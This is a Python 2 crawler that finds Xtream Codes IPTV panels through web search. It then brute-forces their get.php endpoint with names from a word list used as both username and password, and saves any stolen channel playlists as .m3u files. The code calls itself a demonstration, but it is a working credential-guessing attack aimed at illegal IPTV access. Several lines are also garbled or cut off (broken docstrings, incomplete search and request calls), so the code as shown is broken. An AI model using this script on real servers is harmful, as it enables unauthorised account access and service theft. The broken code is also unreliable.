import urllib2
import google
import time
import pyprind
import os
import random
from urlparse import urlparse

Class that handles the crawling process that fetch accounts on illegal IPTVs

Claudio Ludovico (@Ludo237)
Pinperepette (@Pinperepette)
Arm4x (@Arm4x)
class Crawler(object):
    # version
    version = "1.2.3"
    # output default directory
    outputDir = "output"
    # language default directory
    languageDir = "languages"
    # string used to exploit the CMS
    basicString = "/get.php?username=%s&password=%s&type=m3u&output=mpegts"
    # string used to search the CMS
    searchString = "Xtream Codes v1.0.59.5"

    def __init__(self, language = "it"):
        """Default constructor

        Keyword arguments:
        language -- Language parameter allows us to understand what kind of
                    names file we need to use. (default it)
        self.language = language.lower()
        self.parsedUrls = []
        self.foundedAccounts = 0

    def change_language(self, language = "it"):
        """Set the language you want to use to brute force names

        Keyword arguments:
        language -- Language parameter allows us to understand what kind of
                    names file we need to use. (default it)

        boolean -- true if the language file exists, otherwise false
        if os.path.isfile(self.languageDir + "/" + language + ".txt"):
            self.language = language
            return True
            return False

    def search_links(self):
        """Print the first 30 links from a Web search

        We set the limit of 30 links because this script serve as demonstration and it's
        not intended to be use for personal purpose.
        for url in, num=30, stop=1):
            parsed = urlparse(url)
            self.parsedUrls.append(parsed.scheme + "://" + parsed.netloc)

    def search_accounts(self, url = None):
        """Search Accounts
        This is the core method. It will crawl the give url for any possible accounts
        If we found any we will create a new directory under /output with the name
        of the site plus every account as five .m3u. Please use VLC for opening that
        kind of files

        Keyword arguments:
        url -- an url from the fetched list. (default None)

        string -- the status of the crawling session
        if not self.parsedUrls:
            return "You must fetch some URLs first"
            if not url:
                url = random.choice(self.parsedUrls)
            fileName = self.languageDir + "/" + self.language + ".txt"
            fileLength = self.file_length(fileName)
            progressBar = pyprind.ProgBar(fileLength, title = "Fetching account from " + url + " this might take a while.", stream = 1, monitor = True)
            foundedAccounts = 0
            with open(fileName) as f:
                rows = f.readlines()
            for row in rows:
                # Do the injection to the current url using the exploit that we know
                opener = urllib2.build_opener()
                opener.addheaders = [('User-agent', 'Mozilla/5.0')]
                response = + self.basicString % (row.rstrip().lstrip(), row.rstrip().lstrip()))
                fetched =
                # Update the progress bar in order to give to the user a nice
                # way to indicate the time left
                fileLength = fileLength - 1
                # IF the fetched content is not empty
                # we build the dedicated .m3u file
                if len(fetched) > 0:
                    newPath = self.outputDir + "/" + url.replace("http://", "")
                    self.create_file(row, newPath, fetched)
            # Remove the current used url in order to avoid to parse it again
            if self.foundedAccounts != 0:
                return "Search done, account founded on " + url + ": " + str(self.foundedAccounts)
                return "No results for " + url
        except IOError:
            return "Cannot open the current Language file. Try another one"
        except urllib2.HTTPError, e:
            return "Ops, HTTPError exception here. Cannot fetch the current URL " + str(e.code)
        except urllib2.URLError, e:
            return "Ops, the URL seems broken." + str(e.reason)
        except Exception:
            return "Ops something went wrong!"

    def create_file(self, row, newPath, fetched):
        """Create File
        Once the parse founds something worth it, we need to create the .m3u file
        to do so we except a newPath and the current row used from names file and also
        the content from the fetched response

        Keyword arguments:
        row -- row of the language file, this allow us to understand which names
        were useful for the brute force.

        newPath -- The path that we use to store the current fetched accounts.

        fetched -- the current response file from the attack.
        if os.path.exists(newPath) is False:
        outputFile = open(str(newPath) + "/tv_channels_%s.m3u" % row.rstrip().lstrip(), "w")
        self.foundedAccounts = self.foundedAccounts + 1

    def file_length(self, fileName):
        """File Length
        Cheapest way to calculate the rows of a file

        Keyword arguments:
        fileName -- string the filename into which we will check its Length
        with open(fileName) as f:
            for i, l in enumerate(f):
        return i + 1